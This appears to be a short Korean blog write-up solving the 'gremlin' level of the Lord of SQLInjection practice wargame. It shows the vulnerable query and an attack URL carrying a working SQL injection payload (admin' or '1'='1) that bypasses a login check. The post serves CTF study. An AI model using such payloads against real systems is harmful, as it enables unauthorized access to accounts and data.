Problem
Solve
- 기존 구문 → GET 방식
select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}’
- 변경 구문
select id from prob_gremlin where id='admin' and pw='admin' or '1'='1#’
- 공격 구문
https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=admin&pw=admin' or '1'='1
'Study > CTF' 카테고리의 다른 글
Lord of SQLInjection: goblin (0) | 2025.01.21 |
---|---|
Lord of SQLInjection: cobolt (0) | 2025.01.21 |
picoCTF: Insp3ct0r(Web) (1) | 2024.11.09 |
picoCTF: Cookies(Web) (0) | 2024.11.09 |
picoCTF: GET aHEAD(Web) (0) | 2024.07.08 |